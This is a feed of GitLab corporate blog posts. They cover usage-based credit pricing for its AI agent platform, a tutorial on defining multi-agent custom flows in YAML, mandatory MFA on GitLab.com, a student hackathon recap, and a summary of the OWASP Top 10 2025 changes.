The most comprehensive AI-powered DevSecOps platform
@gitlab.com.web.brid.gy
From planning to production, bring teams together in one application. Ship secure code more efficiently to deliver value faster.

[bridged from https://gitlab.com/ on the web: https://fed.brid.gy/web/gitlab.com ]
Introducing GitLab Credits, usage-based pricing for GitLab Duo Agent Platform
We built GitLab Credits because seat-based pricing for agentic AI wasn't working. Seat-based pricing creates AI "haves" and "have-nots" on engineering teams, a fundamental misalignment with the way modern agentic AI should be used across the software development lifecycle. Today, you have to buy a seat for every individual before they can start using AI. While this works for the few heavy users, it can be too expensive and unfair for the majority of the team with light or spiky usage. That's why, in many organizations, only a portion of the team gets an "AI seat."

On top of that, GitLab Duo Agent Platform is different from Duo Pro, Duo Enterprise, and other AI developer tools on the market. Agents and agentic workflows can be invoked by your team when they need AI assistance, and triggered by SDLC events running in the background. With Duo Agent Platform, agentic AI is no longer tied only to user seats.

GitLab Credits addresses these issues as our new virtual currency for usage-based pricing, starting with GitLab Duo Agent Platform. That means every member of your organization with a GitLab account (Premium or Ultimate) can now use agentic AI capabilities without you paying for an AI seat, whether invoked by them or set up as background agents.

## How GitLab Credits work

GitLab Credits are pooled across your entire organization, and your GitLab Duo Agent Platform usage is drawn down from them. That includes both synchronous and asynchronous use of agents and agentic flows:

* Foundational agents such as Security Analyst, Planner, and Data Analyst
* Foundational flows such as Code Review, Developer, and Fix CI/CD Pipeline
* External agents such as Anthropic Claude Code and OpenAI Codex
* Custom agents and flows you build and publish in your GitLab AI Catalog
* Agentic Chat in the GitLab UI and in the IDE used by your developers

**Note:** External agents are available to try at no cost in 18.8 and do not consume GitLab Credits; we will introduce pricing next month with our 18.9 release. Custom flows are currently in beta and do not consume GitLab Credits.

The amount of credits drawn down is based on the number of agentic requests made to large language models (more details here). As more LLMs become available, we will certify them for use with GitLab Duo Agent Platform and add them to this list, giving customers a transparent view of how credits are consumed. The total count of GitLab Credits is calculated at the end of the month based on actual usage. This model also automatically offsets usage from power users against that of lighter users, effectively lowering your total cost of AI for every individual (as compared to paying per seat for every individual).

For simplicity, each GitLab Credit has an **on-demand** list price of $1. You can use GitLab Duo Agent Platform without any commitments, and usage is billed monthly (at the end of each month). For enterprise customers that sign up for **annual commitments**, we offer volume discounts on monthly credits.

As a limited-time promotion\*, all GitLab customers with active Premium and Ultimate subscriptions will automatically receive $12 and $24 in **included credits per user**, respectively. These credits will refresh every month until the end of the promotion period and give your team access to all GitLab Duo Agent Platform features at no extra cost. Once you accept our billing terms, any usage above these included credits will be billed through committed monthly credits or on-demand credits.
## Cost governance with GitLab Credits

**Sizing GitLab Credits:** Your account team has a sizing calculator, available as part of the GA of GitLab Duo Agent Platform, to estimate the number of GitLab Credits you'll need every month. This calculator was built with usage patterns we observed during the beta period. In addition, as an existing or a new customer, you can request a free trial to confirm your estimated actual usage.

**Usage visibility:** With the 18.8 release, you have detailed usage information through two complementary dashboards — one in the GitLab Customers Portal for billing managers focused on financial oversight, and one in-product for administrators focused on operational monitoring. Both provide attribution of usage, cost breakdowns, and historical trends so you always know exactly how your credits are being consumed. If you follow a cross-charging practice internally, you'll be able to use project- and group-level rollups for cost allocations.

**Usage controls:** You can enable or disable GitLab Duo Agent Platform access for specific teams or projects, ensuring that only approved usage counts toward your credits. We also plan to add user-level controls shortly after GA to help you manage who can use GitLab Duo Agent Platform capabilities and draw down credits.

**Automated usage notifications:** We'll proactively keep you informed about your GitLab Credit usage via email alerts when you reach 50%, 80%, and 100% of your committed monthly credits, giving you time to adjust usage, purchase additional commitments, or plan for on-demand billing.

## Upgrading from seat-based GitLab Duo Pro/Enterprise to GitLab Credits for Duo Agent Platform

If you've purchased and are using GitLab Duo Pro or Duo Enterprise, you can keep using those capabilities as supported options. You can upgrade to GitLab Duo Agent Platform at any time to keep everything you can do with "classic" Duo and gain new capabilities such as agentic chat, additional foundational agents, custom agents and flows, external agents, and more. At the time of upgrade, we will roll forward your investment in GitLab Duo Pro and Duo Enterprise seats to GitLab Credits for Duo Agent Platform: The remaining dollar amount of your seat commitments will be exchanged for monthly GitLab Credits with volume-based discounts. Those monthly GitLab Credits can then be shared across every team member in your organization you allow, not just the users who had assigned Duo seats before.

## Competitive comparison: GitLab Credits vs. seat-based pricing

Benefit | GitLab Credits | Seat-based pricing
---|---|---
**AI for everyone** | Every approved team member gets AI access from day one | Creates AI "haves" and "have-nots" — forces seat rationing
**No upfront investment** | Start small with included credits, increase commitment as ROI becomes clear | Must purchase seats upfront before proving value
**Pay for what you use** | Only the AI work actually performed above the included tier is billed | Pay per seat regardless of actual usage
**Optimized spend** | Shared credit pool allows you to offset power users with light users | Must pay for light users, plus overages for premium requests from power users
**Detailed visibility** | Usage dashboards with detailed attribution and historical trends | Limited insight into which users drive value
**Granular cost controls** | Choose who can access, proactive alerts, and upcoming budget controls to limit spend | Limit who gets a seat to control costs
**Sizing flexibility** | Calculator to estimate monthly credits, with larger unit discounts at volume | Count who gets a seat multiplied by price per seat
**Simplified contracts and billing** | Single SKU and bill covers all agentic capabilities across the DevSecOps lifecycle | Multiple AI licenses required across different third-party tools

## Getting started

1. **For existing Premium/Ultimate customers**: With GA, GitLab Duo Agent Platform will be available for customers with active Premium and Ultimate licenses.\*\* GitLab.com SaaS customers will gain access automatically. GitLab Self-Managed customers will gain access when they upgrade to the GitLab 18.8 release (with the planned Duo Agent Platform general availability). GitLab Dedicated customers will be upgraded to GitLab 18.8 during their scheduled maintenance window in February and will be able to use Duo Agent Platform from that point.
2. **Enable GitLab Duo**: Ensure GitLab Duo Agent Platform is enabled in your namespace settings.
3. **Start exploring**: Use your included monthly GitLab Credits to try GitLab Duo Agent Platform capabilities.
4. **Go beyond included credits**: You will be able to opt in to GitLab Credits for expanded usage beyond included credits at the on-demand list price. For volume discounts with commitment, please contact us to get a quote for your specific usage level.

Visit our GitLab Duo Agent Platform documentation to learn more about getting started.

## Notes

\* These included promotional credits are available for a limited time at GA, and subject to change at GitLab's discretion.

\*\* Excludes GitLab Duo with Amazon Q and GitLab Dedicated for Government customers.

> To learn more about GitLab Duo Agent Platform and all the ways agentic AI can transform how your team works, visit our GitLab Duo Agent Platform page. If you are an existing GitLab customer, reach out to your GitLab account manager or partner to schedule a live demonstration of our platform capabilities.

## GitLab Credits FAQ

**1. What are GitLab Credits and why did GitLab introduce them?**

GitLab Credits is a new virtual currency for usage-based GitLab capabilities, starting with GitLab Duo Agent Platform. GitLab introduced this model because seat-based pricing was forcing organizations to ration AI access within engineering teams, and Duo Agent Platform usage is not tied only to seats. Credits are pooled across your entire organization, allowing you to give every team member access to AI capabilities, or to set up background agentic workflows, without requiring individual seat purchases upfront.

**2. How does credit consumption work?**

Credits are drawn down based on the number of agentic requests made, with different rates depending on which LLM is used. For example, you get two model requests per credit for claude-sonnet-4.5 (the default for most features), and 20 requests per credit for models like gpt-5-mini or claude-3-haiku. At those rates, 1,000 claude-sonnet-4.5 requests would consume 500 credits, while 1,000 gpt-5-mini requests would consume only 50.

**3. What's included for existing Premium and Ultimate customers?**

As a limited-time promotion, customers with active Premium and Ultimate subscriptions automatically receive included credits free of charge alongside the GA release of Duo Agent Platform in GitLab 18.8:

* $12 in credits per user per month for Premium
* $24 in credits per user per month for Ultimate

Included credits are allocated at a per-user level, refresh monthly, and enable access to all GitLab Duo Agent Platform features at no extra cost. Usage above these included credits will be billed separately. These included promotional credits are available for a limited time after GA, and subject to change at GitLab's discretion.

**4. How can I control and monitor credit usage?**

GitLab provides multiple governance tools: detailed usage dashboards in both the Customers Portal and in-product, the ability to enable/disable access for specific teams or projects, upcoming user-level controls, and automated email alerts at 50%, 80%, and 100% of committed monthly credits. We also expect to offer a sizing calculator to estimate your monthly credit needs.

**5. How do I get started with GitLab Duo Agent Platform?**

At GA, access for existing Premium/Ultimate customers is automatic on GitLab.com SaaS. Self-Managed customers gain access when upgrading to GitLab 18.8 with the planned Duo Agent Platform general availability. Simply enable GitLab Duo Agent Platform in your namespace settings and start exploring using your included monthly credits. For usage beyond included credits, you can opt in to on-demand billing or contact GitLab for volume discounts with annual commitments.

_This blog post contains "forward-looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
January 16, 2026 at 6:46 AM
Understanding flows: Multi-agent workflows
_Welcome to Part 4 of our eight-part guide, Getting started with GitLab Duo Agent Platform, where you'll master building and deploying AI agents and workflows within your development lifecycle. Follow tutorials that take you from your first interaction to production-ready automation workflows with full customization._

**In this article:**

* What are flows and how do they work?
* Foundational flows provided by GitLab
* Creating custom flows
* Flow execution and orchestration
* Real-world examples and use cases

> 🎯 Try **GitLab Duo Agent Platform** today!

## Introduction to flows

Flows are combinations of one or more agents collaborating together. They orchestrate multi-step workflows to solve complex problems, and they execute on GitLab platform compute.

**Key characteristics of flows:**

* **Multi-agent orchestration**: Combine multiple specialized agents
* **Built-in**: Run on platform compute; no extra environment necessary
* **Event-driven**: Triggered by mention, assignment, or assignment as reviewer
* **Asynchronous**: Run in the background while you continue working
* **Complete workflows**: Handle end-to-end tasks from analysis to implementation

Think of flows as autonomous workflows that can gather context, make decisions, execute changes, and deliver results, all while you focus on other work.

## Flows vs. agents: Understanding the difference

Agents work with you interactively. Flows work for you autonomously.

Aspect | Agents | Flows
---|---|---
**Interaction** | Interactive chat | Autonomous execution
**When to use** | Questions, guidance, and performing tasks interactively | Autonomous multi-step workflows
**User involvement** | Active conversation | Trigger and review results
**Execution time** | Real-time responses | Background processing
**Complexity** | Single-agent tasks | Multi-agent orchestration

## Flow types overview

Type | Interface | Maintainer | Use case
---|---|---|---
**Foundational** | UI actions, IDE interface | GitLab | Software Development, Developer in issues, Fix CI/CD Pipeline, Convert to GitLab CI/CD, Code Review, SAST false positive detection
**Custom** | Mention, assign, assign reviewer | You | Examples: larger migration/modernization, release automation, dependency update management

## Foundational flows

Foundational flows are production-ready workflows created and maintained by GitLab. They're accessible through dedicated UI controls or IDE interfaces.

### Currently available foundational flows

Flow | Where available | How to access | Best for
---|---|---|---
**Software Development** | IDEs (VS Code, JetBrains, Visual Studio) | Flows tab in IDE | Feature implementation, complex refactoring, multi-file changes
**Developer** | GitLab Web UI | "Generate MR with Duo" button on issues | Well-defined features, bug fixes with clear steps
**Fix CI/CD Pipeline** | GitLab Web UI | Failed pipeline interface | Pipeline debugging, CI/CD configuration issues
**Convert to GitLab CI/CD** | GitLab Web UI | "Convert to GitLab CI/CD" button on Jenkinsfile | Jenkins to GitLab CI/CD migration
**Code Review** | GitLab Web UI | Assign as reviewer on MR | Automated code review with AI-native analysis and feedback
**SAST false positive detection** | GitLab Web UI | Security scan results | Automatically identify and filter false positives in SAST findings

## Custom flows

Custom flows are YAML-defined workflows you create for your team's specific needs. They run in GitLab Runner and can be triggered by GitLab events.

> **🎯 Try it now:** Interactive demo of Custom Flows — Explore how to create and configure Custom Flows.
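Before diving into the details, here's the rough shape of a custom flow definition. This is a minimal sketch derived from the schema of the full example later in this article; the component, prompt, and flow names are purely illustrative:

```yaml
# Minimal custom flow skeleton (illustrative names; see the full example below)
version: "v1"
environment: ambient
components:
  - name: "hello_agent"            # a single agent component
    type: AgentComponent
    prompt_id: "hello_prompt"
    inputs:
      - from: "context:goal"       # the triggering comment or goal
        as: "user_goal"
prompts:
  - name: "Hello"
    prompt_id: "hello_prompt"
    prompt_template:
      system: |
        Summarize the triggering request in one short comment.
      user: |
        Goal: {{user_goal}}
      placeholder: history
routers:
  - from: "hello_agent"            # route the single component to the end
    to: "end"
flow:
  entry_point: "hello_agent"
```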
### Why create custom flows?

Custom flows automate repetitive multi-step tasks that are specific to your team's workflow. Unlike foundational flows that serve general purposes, custom flows are tailored to your organization's processes, tools, and requirements.

**Common use cases:**

* **Automated code review**: Multi-stage review process (security scan → quality check → style validation)
* **Compliance checking**: Verify regulatory requirements, license compliance, or security policies on each MR
* **Documentation generation**: Auto-update API docs, README files, or changelogs based on code changes
* **Dependency management**: Weekly security scans, automated updates, and vulnerability reports
* **Custom testing**: Specialized test suites for your tech stack or integration tests

### Real-world example

A fintech company creates a compliance flow that runs on every merge request. When triggered by `@compliance-flow`, the flow executes the following steps:

1. **Security agent** scans code for PCI-DSS violations and checks for exposed sensitive data.
2. **Code review agent** verifies that changes follow secure coding standards and best practices.
3. **Documentation agent** checks that API changes include updated documentation.
4. **Summary agent** aggregates findings and posts a compliance report with pass/fail status.

The entire compliance review happens automatically in 5-10 minutes, providing consistent checks across all merge requests.

### How to trigger custom flows

Custom flows can be triggered in multiple ways:

**1. Via mentions in issues/MRs:** Mention the flow in a comment to trigger it. Example for a documentation generation flow:

```
@doc-generator Generate API documentation for this feature
```

**2. By assigning the flow to an issue or MR:** Assign the flow using either:

* **GitLab UI**: Click the "Assign" button on the issue/MR and select the flow
* **Command**: Use the `/assign` command in a comment. Example:

```
/assign @doc-generator
```

**3. By assigning the flow as a reviewer:** Assign the flow as a reviewer on a merge request using either:

* **GitLab UI**: Click the "Assign reviewer" button on the merge request and select the flow
* **Command**: Use the `/assign_reviewer` command in a comment. Example:

```
/assign_reviewer @doc-reviewer
```

Any of these methods automatically triggers the flow to execute and perform its tasks.

### How to create custom flows

Custom flows are created through the GitLab UI at **Automate → Flows → New flow** in your project, or from **Explore → AI Catalog → Flows → New flow**. You define your flow using a YAML configuration that specifies components, prompts, routing, and execution flow. The YAML schema allows you to create sophisticated multi-agent workflows with precise control over agent behavior and orchestration.

**Key elements of a custom flow:**

* **Components**: Define the agents and steps in your workflow
* **Prompts**: Configure AI model behavior and instructions
* **Routers**: Control the flow between components
* **Toolsets**: Specify which GitLab API tools agents can use

### Example custom flow YAML

**Background:** This example shows a feature implementation flow for a travel booking platform. When a developer creates an issue with feature requirements, they can trigger this flow to automatically analyze the requirements, review the codebase, implement the solution, and create a merge request, all without manual intervention.
Here's the YAML configuration:

```yaml
version: "v1"
environment: ambient
components:
  - name: "implement_feature"
    type: AgentComponent
    prompt_id: "implementation_prompt"
    inputs:
      - from: "context:goal"
        as: "user_goal"
      - from: "context:project_id"
        as: "project_id"
    toolset:
      - "get_issue"
      - "get_repository_file"
      - "list_repository_tree"
      - "find_files"
      - "blob_search"
      - "create_file"
      - "create_commit"
      - "create_merge_request"
      - "create_issue_note"
    ui_log_events:
      - "on_agent_final_answer"
      - "on_tool_execution_success"
      - "on_tool_execution_failed"
prompts:
  - name: "Cheapflights Feature Implementation"
    prompt_id: "implementation_prompt"
    unit_primitives: []
    prompt_template:
      system: |
        You are an expert full-stack developer specializing in travel booking platforms, specifically Cheapflights.

        Your task is to:
        1. Extract the issue IID from the goal (look for "Issue IID: XX")
        2. Use get_issue with project_id={{project_id}} and issue_iid to retrieve issue details
        3. Analyze the requirements for the flight search feature
        4. Review the existing codebase using list_repository_tree, find_files, and get_repository_file
        5. Design and implement the solution following Cheapflights best practices
        6. Create all necessary code files using create_file (call multiple times for multiple files)
        7. Commit the changes using create_commit
        8. Create a merge request using create_merge_request
        9. Post a summary comment to the issue using create_issue_note with the MR link

        Cheapflights Domain Expertise:
        - Flight search and booking systems (Amadeus, Sabre, Skyscanner APIs)
        - Fare comparison and pricing strategies
        - Real-time availability and inventory management
        - Travel industry UX patterns
        - Performance optimization for high-traffic flight searches

        Code Standards:
        - Clean, maintainable code (TypeScript/JavaScript/Python/React)
        - Proper state management for React components
        - RESTful API endpoints with comprehensive error handling
        - Mobile-first responsive design
        - Proper timezone handling (use moment-timezone or date-fns-tz)
        - WCAG 2.1 accessibility compliance

        Flight-Specific Best Practices:
        - Accurate fare calculations (base fare + taxes + fees + surcharges)
        - Flight duration calculations across timezones
        - Search filter logic (price range, number of stops, airlines, departure/arrival times)
        - Sort algorithms (best value, fastest, cheapest)
        - Handle edge cases: date line crossing, daylight saving time, red-eye flights
        - Currency amounts use proper decimal handling (avoid floating point errors)
        - Dates use ISO 8601 format
        - Flight codes follow IATA standards (3-letter airport codes)

        Implementation Requirements:
        - No TODOs or placeholder comments
        - All functions must be fully implemented
        - Include proper TypeScript types or Python type hints
        - Add JSDoc/docstring comments for all functions
        - Comprehensive error handling and input validation
        - Basic unit tests for critical functions
        - Performance considerations for handling large result sets

        CRITICAL - Your final comment on the issue MUST include:
        - **Implementation Summary**: Brief description of what was implemented
        - **Files Created/Modified**: List of all files with descriptions
        - **Key Features**: Bullet points of main functionality
        - **Technical Approach**: Brief explanation of architecture/patterns used
        - **Testing Notes**: How to test the implementation
        - **Merge Request Link**: Direct link to the created MR (format: [View Merge Request](MR_URL))

        IMPORTANT TOOL USAGE:
        - Extract the issue IID from the goal first (e.g., "Issue IID: 12" means issue_iid=12)
        - Use get_issue with project_id={{project_id}} and issue_iid=<extracted_iid>
        - Create multiple files by calling create_file multiple times (once per file)
        - Use create_commit to commit all files together with a descriptive commit message
        - Use create_merge_request to create the MR and capture the MR URL from the response
        - Use create_issue_note with project_id={{project_id}}, noteable_id=<issue_iid>, and body=<your complete summary with MR link>
        - Make sure to include the MR link in the comment body so users can easily access it
      user: |
        Goal: {{user_goal}}
        Project ID: {{project_id}}

        Please complete the following steps:
        1. Extract the issue IID and retrieve full issue details
        2. Analyze the requirements thoroughly
        3. Review the existing codebase structure and patterns
        4. Implement the feature with production-ready code
        5. Create all necessary files (components, APIs, tests, documentation)
        6. Commit all changes with a clear commit message
        7. Create a merge request
        8. Post a detailed summary comment to the issue including the MR link
      placeholder: history
    params:
      timeout: 300
routers:
  - from: "implement_feature"
    to: "end"
flow:
  entry_point: "implement_feature"
```

**What this flow does:** This flow orchestrates an AI agent to automatically implement a feature by analyzing issue requirements, reviewing the codebase, writing production-ready code with domain expertise, and creating a merge request with a detailed summary comment.

For complete documentation and examples, see:

* Custom Flows documentation
* Flow Registry Framework (YAML Schema)

## Flow execution

Flows run on GitLab platform compute. When triggered by an event (mention, assignment, or button click), a session is created and the flow starts to execute.

### Available environment variables

Flows have access to environment variables that provide context about the trigger and the GitLab object:

* **`AI_FLOW_CONTEXT`** — JSON-serialized context including MR diffs, issue descriptions, comments, and discussion threads
* **`AI_FLOW_INPUT`** — The user's prompt or comment text that triggered the flow
* **`AI_FLOW_EVENT`** — The event type that triggered the flow (`mention`, `assign`, `assign_reviewer`)

These variables allow your flow to understand what triggered it and access the relevant GitLab data to perform its task.

### Multi-agent flows

Custom flows can include multiple agent components that work together sequentially. The flow's YAML configuration defines:

* **Components**: One or more agents (AgentComponent) or deterministic steps
* **Routers**: Define the flow between components (e.g., from component A to component B to end)
* **Prompts**: Configure each agent's behavior and model

For example, a code review flow might have a security agent, then a quality agent, then an approval agent, with routers connecting them in sequence.

### Monitoring flow execution

To view flows that are running for your project:

1. Navigate to **Automate → Sessions**.
2. Select any session to view more details.
3. The **Details** tab shows a link to the CI/CD job logs.

Sessions show detailed information including step-by-step progress, tool invocations, reasoning, and decision-making process.

### When to use flows

* Complex multi-step tasks
* Background automation
* Event-driven workflows
* Multi-file changes
* Tasks that take time
* Automated reviews/checks

## What's next?

You now understand flows, how to create them, and when to use them vs. agents. Next, learn how to discover, create, and share agents and flows across your organization in Part 5: AI Catalog.
Explore the AI Catalog to browse available flows and agents, add them to your projects, and publish your own agents and flows.

## Resources

* GitLab Duo Agent Platform Flows
* Foundational Flows documentation
* Custom Flows documentation
* Flow execution configuration
* GitLab CI/CD Variables guide
* Service Accounts

* * *

**Next:** Part 5: AI Catalog
**Previous:** Part 3: Understanding agents
about.gitlab.com
January 14, 2026 at 10:46 PM
Strengthening GitLab.com security: Mandatory multi-factor authentication
To strengthen the security of all user accounts on GitLab.com, GitLab is implementing mandatory multi-factor authentication (MFA) for all users who sign in using a username and password, including password-based authentication to API endpoints.

## Why this is happening

This move is a vital part of our Secure by Design commitment. MFA provides critical defense against credential stuffing and account takeover attacks, which remain persistent threats across the software development industry.

## Key information to know

### What is changing?

GitLab is making MFA mandatory for sign-ins that authenticate with a username and password. This introduces a critical second layer of security beyond just a password.

### Does this apply to me?

1. _**Yes, it applies if:**_ You sign in to GitLab.com with a username and a password, or use a password to authenticate to the API.
2. _**No, it does not apply if:**_ You exclusively use social sign-on (such as Google) or single sign-on (SSO) for access. (_Please note: If you use SSO but also have a password for direct login, you will still need MFA for any non-SSO, password-based login._)

### When is the rollout?

The implementation will be a phased approach over the coming months, intended to both minimize unexpected interruptions and productivity loss for users and prevent account lockouts. Groups of users will be asked to enable MFA over time. Each group will be selected based on the actions they've taken or the code they've contributed to. You will be notified in the following ways:

* ✉️ Email notification - prior to the phase where you will be impacted
* 🔔 Regular in-product reminders - 14 days before
* ⏱️ After a specific time period (this will be shared via email) - blocked from accessing GitLab until you enable MFA

### What action do I need to take?

1. If you sign in to GitLab.com with a username and a password, we highly recommend you proactively set up one of the available MFA methods today, such as passkeys, an authenticator app, a WebAuthn device, or email verification. This ensures the most secure and seamless transition:
   * Go to your GitLab.com **User Settings**.
   * Select the **Account** section.
   * Activate **two-factor authentication** and configure your preferred method (e.g., authenticator app or a WebAuthn device).
   * **Securely save your recovery codes** to guarantee you can regain access if needed.
2. If you use a password to authenticate to the API, we highly recommend you proactively switch to a personal access token (PAT). Read our documentation to learn more. A sketch of this switch for CI automation follows the FAQ below.

## FAQ

_What happens if I don't enable MFA by the deadline?_

* You'll be required to set up MFA before you can sign in.

_Does this affect CI/CD pipelines or automation?_

* Yes, unless you're using PATs or deploy tokens instead of passwords.

_I use SSO but sometimes sign in directly, do I need MFA?_

* Yes, MFA is required for any password-based authentication, including fallback scenarios.

Specific timelines and further resources will be shared as rollout dates approach. Thank you for your attention to this important change.
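For CI/CD jobs that currently authenticate with a password, the switch usually amounts to storing a PAT as a masked CI/CD variable and referencing it in the job. A minimal sketch, where the job name, variable name, and project path are hypothetical:

```yaml
# Hypothetical .gitlab-ci.yml job that authenticates with a PAT stored in a
# masked CI/CD variable (DOCS_SYNC_PAT) instead of a username and password.
sync-docs:
  script:
    # "oauth2" is a literal username; GitLab accepts a PAT as the HTTPS password
    - git clone "https://oauth2:${DOCS_SYNC_PAT}@gitlab.com/example-group/example-docs.git"
    # The same token also works for REST API calls via the PRIVATE-TOKEN header
    - 'curl --header "PRIVATE-TOKEN: ${DOCS_SYNC_PAT}" "https://gitlab.com/api/v4/projects"'
```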
about.gitlab.com
January 9, 2026 at 10:44 PM
How IIT Bombay students are coding the future with GitLab
The GitLab team recently had the privilege of judging the **iHack Hackathon** at **IIT Bombay's E-Summit**. The energy was electric, the coffee was flowing, and the talent was undeniable. But what struck us most wasn't just the code — it was the sheer determination of students to solve real-world problems, often overcoming significant logistical and financial hurdles to simply be in the room. Through our GitLab for Education program, we aim to empower the next generation of developers with tools and opportunity. Here is a look at what the students built, and how they used GitLab to bridge the gap between idea and reality.

## The challenge: Build faster, build securely

The premise for the GitLab track of the hackathon was simple: Don't just show us a product; show us how you built it. We wanted to see how students utilized GitLab's platform — from Issue Boards to CI/CD pipelines — to accelerate the development lifecycle. The results were inspiring.

## The winners

### 1st place: Team Decode — Democratizing Scientific Research

**Project:** FIRE (Fast Integrated Research Environment)

Team Decode took home the top prize with a solution that warms a developer's heart: a local-first, blazing-fast data processing tool built with Rust and Tauri. They identified a massive pain point for data science students: existing tools are fragmented, slow, and expensive. Their solution, FIRE, allows researchers to visualize complex formats (like NetCDF) instantly. What impressed the judges most was their "hacker" ethos. They didn't just build a tool; they built it to be open and accessible.

**How they used GitLab:** Since the team lived far apart, asynchronous communication was key. They utilized **GitLab Issue Boards** and **Milestones** to track progress and integrated their repo with Telegram to get real-time push notifications. As one team member noted, "Coordinating all these technologies was really difficult, and what helped us was GitLab... the Issue Board really helped us track who was doing what."

### 2nd place: Team BichdeHueDost — Reuniting to Solve Payments

**Project:** SemiPay (RFID Cashless Payment for Schools)

The team name, BichdeHueDost, translates to "friends who have been set apart." It's a fitting name for a group of friends who went to different colleges but reunited to build this project. They tackled a unique problem: handling cash in schools for young children. Their solution used RFID cards backed by a blockchain ledger to ensure secure, cashless transactions for students.

**How they used GitLab:** They utilized GitLab CI/CD to automate the build process for their Flutter application (APK), ensuring that every commit resulted in a testable artifact. This allowed them to iterate quickly despite the "flaky" nature of cross-platform mobile development.

### 3rd place: Team ZenYukti — The Eyes of the Campus

**Project:** KSHR (Unified Intelligence Platform)

Team ZenYukti impressed us with a heavy-duty enterprise architecture. They built a comprehensive campus monitoring system designed to detect anomalies and ensure student safety using CCTV and biometric data.

**How they used GitLab:** This team showed a sophisticated understanding of DevOps. They used **GitLab CI** with conditional logic — triggering specific pipelines only when front-end or back-end folders changed (a sketch of this pattern follows below). They also utilized private container registries to manage their Docker images securely.
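Team ZenYukti's conditional-pipeline setup maps to GitLab CI/CD's `rules:changes` keyword. Here's a minimal sketch of the pattern; the job names, commands, and folder paths are hypothetical, not their actual configuration:

```yaml
# .gitlab-ci.yml sketch: run each job only when files in its folder change
build-frontend:
  script:
    - npm ci && npm run build
  rules:
    - changes:
        - frontend/**/*   # job runs only if frontend files changed

build-backend:
  script:
    - pip install -r requirements.txt && pytest
  rules:
    - changes:
        - backend/**/*    # job runs only if backend files changed
```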
## Beyond the code: A lesson in inclusion

While the code was impressive, the most powerful moment of the event happened away from the keyboard. During the feedback session, we learned about the journey Team ZenYukti took to get to Mumbai. They traveled over 24 hours, covering nearly 1,800 kilometers. Because flights were too expensive and trains were booked, they traveled in the "General Coach" — a non-reserved, severely overcrowded carriage. As one student described it:

_"You cannot even imagine something like this... there are no seats... people sit on the top of the train. This is what we have endured."_

This hit home. Diversity, Inclusion, and Belonging are core values at GitLab. We realized that for these students, the barrier to entry wasn't intellect or skill - it was access. In that moment, we decided to break that barrier. We committed to reimbursing the travel expenses for the participants who struggled to get there. It's a small step, but it underlines a massive truth: **talent is distributed equally, but opportunity is not.**

### The future is bright (and automated)

We also saw incredible potential in teams like Prometheus, who attempted to build an autonomous patch remediation tool (DevGuardian), and Team Arrakis, who built a voice-first job portal for blue-collar workers using GitLab Duo to troubleshoot their pipelines.

To all the students who participated: You are the future. Through GitLab for Education, we are committed to providing you with the top-tier tools (like GitLab Ultimate) you need to learn, collaborate, and change the world — whether you are coding from a dorm room, a lab, or a train carriage. **Keep shipping.**

> 💡 Learn more about the GitLab for Education program.
about.gitlab.com
January 8, 2026 at 10:44 PM
OWASP Top 10 2025: What's changed and why it matters
The OWASP Foundation has released the eighth edition of its influential "Top 10 Security Risks" list for 2025, introducing significant changes that reflect the evolving landscape of application security. Based on analysis of more than 175,000 Common Vulnerabilities and Exposures (CVE) records and feedback from security practitioners across the globe, this update addresses modern attack vectors. Here's everything you need to know about what's changed, why these changes matter, and how to protect your systems.

> 💡 Join GitLab Transcend on February 10 to learn how agentic AI transforms software delivery. Hear from customers and discover how to jumpstart your own modernization journey. Register now.

## What's new in 2025?

The shift from 2021 (the last time the list came out) to 2025 represents more than minor adjustments; it marks a fundamental shift in application security. Two entirely new categories entered the list and one category was consolidated into another, highlighting emerging risks that traditional testing often misses.

### Two new categories

* **A03: Software Supply Chain Failures**: Expands the 2021 category "Vulnerable and Outdated Components" to encompass the entire software supply chain, including dependencies, build systems, and distribution infrastructure. Despite having the fewest occurrences in testing data, this category has the highest average exploit and impact scores from CVEs.
* **A10: Mishandling of Exceptional Conditions**: Focuses on improper error handling, logical errors, and failing-open scenarios. This addresses how systems respond to abnormal conditions.

### Major ranking changes

* Security Misconfiguration surged from #5 (2021) to #2 (2025), now affecting 3% of tested applications.
* Server-Side Request Forgery (SSRF) has been consolidated into A01: Broken Access Control.
* Cryptographic Failures dropped from #2 to #4.
* Injection fell from #3 to #5.
* Insecure Design moved from #4 to #6.

## Why these changes were made

The OWASP methodology combines data-driven analysis with community insights. The 2025 edition analyzed 589 Common Weakness Enumerations (CWEs), a substantial increase from the approximately 400 CWEs in 2021. This expansion reflects the growing complexity of modern software systems and the need to capture emerging threats.

The community survey component addresses a fundamental limitation: testing data essentially looks into the past. By the time security researchers develop testing methodologies and integrate them into automated tools, years may have passed. The two community-voted categories ensure that emerging risks identified by frontline practitioners are included, even if they're not yet prevalent in automated testing data.

The rise of Security Misconfiguration highlights an industry trend toward configuration-based security, while Software Supply Chain Failures acknowledges the rise of sophisticated attacks targeting compromised packages.

## Using GitLab Ultimate for vulnerability detection and management

GitLab Ultimate provides comprehensive security scanning to detect risks across the 2025 OWASP Top 10 categories. The end-to-end platform analyzes your project's source code, dependencies, and infrastructure definitions. It uses Advanced Static Application Security Testing (SAST) to detect injection flaws, cryptographic failures, and insecure design patterns in source code.
Infrastructure as Code (IaC) scanning finds security misconfigurations in your deployment definitions. Secret Detection prevents the leakage of credentials, and Dependency Scanning uncovers libraries with known vulnerabilities in your software supply chain, which directly addresses the new A03 category for Software Supply Chain Failures. In addition:

* Dynamic Application Security Testing (DAST) probes your deployed application for broken access control, authentication failures, and injection vulnerabilities by simulating attack vectors.
* API Security Testing probes your API endpoints for input validation weaknesses and authentication bypasses.
* Web API Fuzz Testing uncovers how your application handles exceptional conditions by generating unexpected inputs, which directly addresses the new A10 category for Mishandling of Exceptional Conditions.

Security scanning integrates seamlessly into your CI/CD pipeline, running when code is pushed from a feature branch so developers can remediate vulnerabilities before they reach production. Security findings are consolidated in the Vulnerability Report, where security teams can triage, analyze, and track remediation. GitLab also allows you to leverage AI agents, such as the Security Analyst Agent available in GitLab Duo Agent Platform, to quickly determine which vulnerabilities are most critical and how to take action on them. You can enforce additional controls through merge request approval policies and pipeline execution policies to ensure security scanning runs consistently across your organization. Customer Success and Professional Services teams at GitLab ensure you derive value from an investment in GitLab in a timely manner.

